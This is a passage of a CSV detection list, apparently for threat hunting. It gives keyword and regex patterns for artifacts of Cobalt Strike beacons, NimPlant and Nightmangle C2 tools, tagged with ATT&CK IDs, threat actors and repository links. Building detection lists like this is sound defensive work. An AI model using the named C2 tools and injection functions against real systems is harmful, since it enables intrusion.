- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_test.exe*",".{0,1000}beacon_test\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_top *",".{0,1000}beacon_top\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_top_callback*",".{0,1000}beacon_top_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*BeaconApi.cs*",".{0,1000}BeaconApi\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*beacon-c2-go*",".{0,1000}beacon\-c2\-go.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wahyuhadi/beacon-c2-go","1","1","N/A","10","10","38","10","2020-01-14T11:15:42Z","2019-12-22T08:59:34Z" "*BeaconCleanupProcess*",".{0,1000}BeaconCleanupProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconConsoleWriter.cs*",".{0,1000}BeaconConsoleWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconGetSpawnTo*",".{0,1000}BeaconGetSpawnTo.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*beacongrapher.py*",".{0,1000}beacongrapher\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconInjectProcess*",".{0,1000}BeaconInjectProcess.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BeaconInjectTemporaryProcess*",".{0,1000}BeaconInjectTemporaryProcess.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*BeaconJob.cs*",".{0,1000}BeaconJob\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BeaconJobWriter.cs*",".{0,1000}BeaconJobWriter\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*beaconlogs.json*",".{0,1000}beaconlogs\.json.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beaconlogtracker.py*",".{0,1000}beaconlogtracker\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 